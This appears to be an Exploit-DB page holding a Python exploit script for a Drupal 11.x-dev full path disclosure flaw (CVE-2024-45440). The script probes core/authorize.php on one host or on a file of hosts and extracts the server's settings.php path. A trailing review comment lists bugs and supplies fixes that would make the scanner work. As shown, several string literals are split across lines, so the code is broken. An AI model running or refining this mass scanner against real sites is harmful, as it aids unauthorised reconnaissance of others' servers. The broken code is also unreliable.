
3 changes to exploits/shellcodes/ghdb FoxCMS 1.2.5 - Remote Code Execution (RCE) Drupal 11.x-dev - Full Path Disclosure
99 lines
No EOL
3.4 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# Exploit Title: Drupal 11.x-dev - Full Path Disclosure
|
|
# Date: 2025-04-16
|
|
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
|
# Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
|
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
|
|
# Version: 11.x-dev
|
|
# CVE: CVE-2024-45440
|
|
|
|
# -*- coding:UTF-8 -*-
|
|
import re
|
|
import requests
|
|
def banners():
|
|
cve_id = "CVE-2024-45440"
|
|
description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
|
|
"core/authorize.php allows Full Path Disclosure (even
|
|
when error logging is None) " \
|
|
"if the value of hash_salt is file_get_contents of a file
|
|
that does not exist."
|
|
disclaimer = "This tool is for educational purposes only. Any misuse of
|
|
this information is the responsibility of " \
|
|
"the person utilizing this tool. The author assumes no
|
|
responsibility or liability for any misuse or " \
|
|
"damage caused by this program."
|
|
width = 100
|
|
banner_top_bottom = "=" * width
|
|
banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
|
|
banner =
|
|
f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
|
|
|
|
return banner
|
|
def scan_single_url(url=None):
|
|
if url is None:
|
|
print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")
|
|
|
|
url = input("[+] IP/Domain: ")
|
|
if not url.startswith('https://') and not url.startswith('http://'):
|
|
full_url = 'http://' + url + '/core/authorize.php'
|
|
print("[*] Scanning...")
|
|
try:
|
|
headers = {
|
|
"Host": url,
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;
|
|
rv:133.0) Gecko/20100101 Firefox/133.0",
|
|
"Accept":
|
|
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
|
|
"Accept-Language":
|
|
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
|
|
}
|
|
response = requests.get(full_url, headers,timeout=10)
|
|
pattern = r'<em class="placeholder">(/.*?settings\.php)'
|
|
matches = re.findall(pattern, response.text)
|
|
# print(response.text)
|
|
if 'settings.php' in response.text:
|
|
print(f"[+] {url} Existed!")
|
|
for match in matches:
|
|
print("[+] The full path is:", match)
|
|
return True
|
|
else:
|
|
print(f"[-] {url} Not Exist!")
|
|
return False
|
|
except TimeoutError:
|
|
print(f"[-] {url} Timeout!")
|
|
except Exception as e:
|
|
print(f"[-] {url} Failed!")
|
|
return False
|
|
def scan_multiple_urls():
|
|
print("[+] Input the path of txt Example: ./url.txt or
|
|
C:\\the\\path\\to\\url.txt")
|
|
url_path = input("[+] Path: ")
|
|
url_list = []
|
|
result_list = []
|
|
try:
|
|
with open(url_path, 'r', encoding='utf-8') as f:
|
|
lines = f.readlines()
|
|
for line in lines:
|
|
url_list.append(line.strip())
|
|
except FileNotFoundError as e:
|
|
print("[-] File Not Found!")
|
|
for url in url_list:
|
|
result = scan_single_url(url)
|
|
if result:
|
|
result_list.append(url)
|
|
print("[+] Successful Target:")
|
|
for result in result_list:
|
|
print(f"[+] {result}")
|
|
def main():
|
|
print(banners())
|
|
print("[1] Scan single url\n[2] Scan multiple urls")
|
|
choice = input("[+] Choose: ")
|
|
if choice == '1':
|
|
scan_single_url()
|
|
elif choice == '2':
|
|
scan_multiple_urls()
|
|
else:
|
|
print("[-] Invalid option selected!")
|
|
pass
|
|
if __name__ == '__main__':
|
|
main() |
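Review bot: In `scan_single_url`, `full_url` appears to be assigned only on the branch for inputs without a scheme (indentation is lost on this page, so this is inferred), so a target entered as `http://…` or `https://…` hits an unbound name inside the `try`, is swallowed by `except Exception`, and is reported as `Failed!` — a false negative for anyone checking their own sites. The `headers` dict is passed as the second positional argument of `requests.get`, which is `params`, so it lands in the query string instead of the request headers; the call should read `requests.get(full_url, headers=headers, timeout=10)`. `except TimeoutError` does not catch a requests timeout, which is raised as `requests.exceptions.Timeout`, so the `Timeout!` branch is effectively dead and that path falls through to the generic handler. The verdict test `'settings.php' in response.text` is looser than the regex next to it, so a page can be reported as `Existed!` with no path extracted; `if matches:` would tie the result to the evidence. Several string literals and the `banner =` assignment are split across file lines as shown, so the file may not parse as committed.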